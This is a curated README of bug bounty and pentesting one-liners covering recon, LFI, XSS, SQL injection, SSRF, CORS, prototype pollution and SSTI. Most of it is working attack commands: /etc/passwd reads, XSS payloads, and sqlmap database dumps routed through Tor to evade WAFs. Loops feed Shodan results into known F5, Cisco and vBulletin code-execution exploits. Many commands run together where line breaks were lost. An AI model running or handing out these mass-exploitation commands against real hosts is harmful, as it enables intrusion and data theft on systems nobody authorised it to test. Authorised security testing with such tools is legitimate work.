A curated list of recon & vulnerability hunting one-liners for bug bounty, pentesting, and automation.
- LFI
- Open Redirect
- SSRF
- XSS
- SQL Injection
- Hidden Directories
- Sensitive Files
- CORS
- Prototype Pollution
- JavaScript Analysis
- SSTI
- Misc
cat targets.txt | (gau || hakrawler || waybackurls || katana) | grep "=" | dedupe | httpx -silent -paths lfi_wordlist.txt -threads 100 -random-agent -x GET,POST -status-code -follow-redirects -mc 200 -mr "root:[x*]:0:0:"echo target.com | (gau || hakrawler || waybackurls || katana) | grep -a -i \=http | qsreplace 'http://evil.com' | while read host; do curl -s -L "$host" -I | grep "http://evil.com" && echo -e "$host \033[0;31mVulnerable\n"; donecat subs.txt | (gau || hakrawler || waybackurls || katana) | grep "=" | dedupe | qsreplace 'http://example.com' | httpx -fr -title -match-string 'Example Domain'cat urls.txt | grep "=" | qsreplace "burpcollaborator_link" >> tmp-ssrf.txt; httpx -silent -l tmp-ssrf.txt -frfile=$1; key="API_KEY"; while read line; do curl https://api.knoxss.pro -d target=$line -H "X-API-KEY: $key" -s | grep PoC; done < $filecat domains.txt | (gau || hakrawler || waybackurls || katana) | grep -Ev "\.(jpeg|jpg|png|ico|gif|css|woff|svg)$" | uro | grep = | qsreplace "<img src=x onerror=alert(1)>" | httpx -silent -nc -mc 200 -mr "<img src=x onerror=alert(1)>"cat targets.txt | (gau || hakrawler || waybackurls || katana) | httpx -silent | Gxss -c 100 -p Xss | grep "URL" | cut -d '"' -f2 | sort -u | dalfox pipeecho target.com | (gau || hakrawler || waybackurls || katana) | grep '=' | qsreplace '"><script>alert(1)</script>' | while read host; do curl -s --path-as-is --insecure "$host" | grep -qs "<script>alert(1)</script>" && echo "$host \033[0;31mVulnerable"; donecat subs.txt | (gau || hakrawler || katana || waybckurls) | grep "=" | dedupe | anew tmp-sqli.txt && sqlmap -m tmp-sqli.txt --batch --random-agent --level 5 --risk 3 --dbsfor i in $(cat tmp-sqli.txt); do ghauri -u "$i" --level 3 --dbs --current-db --batch --confirm; doneLoop through potentially vulnriable SQLi file and show exploited ones to file
cat maybe_vuln_to_sqli.txt | while read -r url; do
ghauri -u "$url" --batch --dbs 2>/dev/null | grep -qi "available databases" && echo "$url";
done | anew /root/nucleye/output/confirmed_sqli.txtWAF Bypass (TOR)
sqlmap -r request.txt --time-sec=10 --tor --tor-type=SOCKS5 --check-tor --dbs --random-agent --tamper=space2comment📁 Hidden Directories
dirsearch -l ips_alive --full-url --recursive --exclude-sizes=0B --random-agent -o output.txtffuf -c -w urls.txt:URL -w wordlist.txt:FUZZ -u URL/FUZZ -mc all -fc 500,502 -ac -recursion -v -of json -o output.jsonExtract URLs from ffuf JSON
cat output.json | jq | grep -o '"url": "http[^"]*"' | grep -o 'http[^"]*' | anew out.txtecho target.com | (gau || hakrawler || waybackurls || katana) | grep -E ".xls|\.xml|\.json|\.pdf|\.sql|\.docx|\.zip|\.tar.gz|\.bak|\.7z|\.rar"echo target.com | (gau || hakrawler || waybackurls || katana) | while read url; do curl -s -I -H "Origin: https://evil.com" "$url" | grep 'https://evil.com' && echo "[VULN] $url"; donesubfinder -d target.com -all -silent | httpx -silent -threads 100 | anew alive.txt && sed 's/$/\/?__proto__[testparam]=exploit\//' alive.txt | page-fetch -j 'window.testparam == "exploit"? "[VULNERABLE]" : "[NOT VULNERABLE]"' | grep "VULNERABLE"Find JS Files
cat target.txt | (gau || hakrawler || waybackurls || katana) | grep -i "\.js" | egrep -v "\.json|\.jsp" | anew js.txtExtract Endpoints
cat main.js | grep -oh "\"\/[a-zA-Z0-9_/?=&]*\"" | sed 's/^"//' | sed 's/"$//' | sort -ufor url in $(cat targets.txt); do python3 tplmap.py -u $url; doneShodan Scan
cat my_ips.txt | xargs -L 100 shodan scan submit --wait 0Nuclei Screenshots
nuclei -l target.txt -headless -t nuclei-templates/headless/screenshot.yaml -vNmap CIDR → IPs
cat cidr.txt | xargs -I @ sh -c 'nmap -sn @ | grep "Nmap scan report" | sed "s/Nmap scan report for //g"' | anew nmap-ips.txtDownload JS Files
mkdir -p js_files; while read -r url; do curl -sSL "$url" -o "js_files/$(basename "$url")"; done < js.txtsubfinder -d HOST -all -silent | httpx -silent -threads 300 | anew -q FILE.txt && sed 's/$/\/?__proto__[testparam]=exploit\//' FILE.txt | page-fetch -j 'window.testparam == "exploit"? "[VULNERABLE]" : "[NOT VULNERABLE]"' | sed "s/(//g" | sed "s/)//g" | sed "s/JS //g" | grep "VULNERABLE"shodan search http.favicon.hash:-335242539 "3992" --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host; do
curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" | grep -q root &&
printf "$host Vulnerable\n" ||
printf "$host Not Vulnerable\n"
donewhile read LINE; do
curl -s -k "https://$LINE/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../" |
head | grep -q "Cisco" &&
echo "[VULNERABLE] $LINE" ||
echo "[NOT VULNERABLE] $LINE"
done < HOSTS.txtcat URLS.txt | while read h; do
curl -sk "$h/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(1)+xx=%22test&from_url=x" |
grep -qs "onmouse" && echo "$h: VULNERABLE"
doneshodan search http.favicon.hash:-601665621 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host; do
curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel \
-d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();' |
grep -q phpinfo &&
echo "$host VULNERABLE" ||
echo "$host Not Vulnerable"
doneassetfinder --subs-only HOST | gau | egrep -v '(.css|.png|.jpg|.svg|.gif)' | while read url; do
curl -s $url | grep -Eo "var [a-zA-Z0-9_]+"
donecat FILE.js | grep -oh '"/[a-zA-Z0-9_/?=&]*"' | sed 's/"//g' | sort -ufor HOST in $(cat HOSTS.txt); do
for ip in $(dig a $HOST +short); do
whois $ip | grep -e "CIDR\|Organization"
done
doneexport host="HOST"
curl -s "https://rapiddns.io/subdomain/$host?full=1" | grep "$host" | sort -ucurl -s https://dns.bufferover.run/dns?q=.HOST | jq -r .FDNS_A[] | cut -d',' -f2 | sort -uexport domain="HOST"
curl "https://tls.bufferover.run/dns?q=$domain" | jq -r .Results[] | rev | cut -d ',' -f1 | rev | sort -ucurl -s "https://riddler.io/search/exportcsv?q=pld:HOST" | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -ucurl -s "https://www.virustotal.com/ui/domains/HOST/subdomains?limit=40" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -ucurl -s "https://certspotter.com/api/v1/issuances?domain=HOST&include_subdomains=true&expand=dns_names" |
jq .[].dns_names | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -ucurl -s "http://web.archive.org/cdx/search/cdx?url=*.HOST/*&output=text&fl=original&collapse=urlkey" |
sed 's_https*://__' | cut -d/ -f1 | sort -uffuf -u https://FUZZ.HOST -w FILE.txt -vgrep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' file.txtsubfinder -silent -d HOST | filter-resolved | cf-check | sort -u | naabu -rate 40000 -silent -verify | httprobesubfinder -d HOST >> FILE
assetfinder --subs-only HOST >> FILE
amass enum -d HOST >> FILE
subjack -w FILEcurl -s http://HOST/sitemap.xml | grep loc | sed 's/<[^>]*>//g'waybackurls HOST | grep '=' | qsreplace '"><script>alert(1)</script>' | while read url; do
curl -sk "$url" | grep alert
donegau URL | while read url; do
curl -sIH "Origin: https://evil.com" $url | grep evil.com
donenmap -oX - HOST | jq | httpxThis is for educational and authorized testing only.
PRs welcome 🔥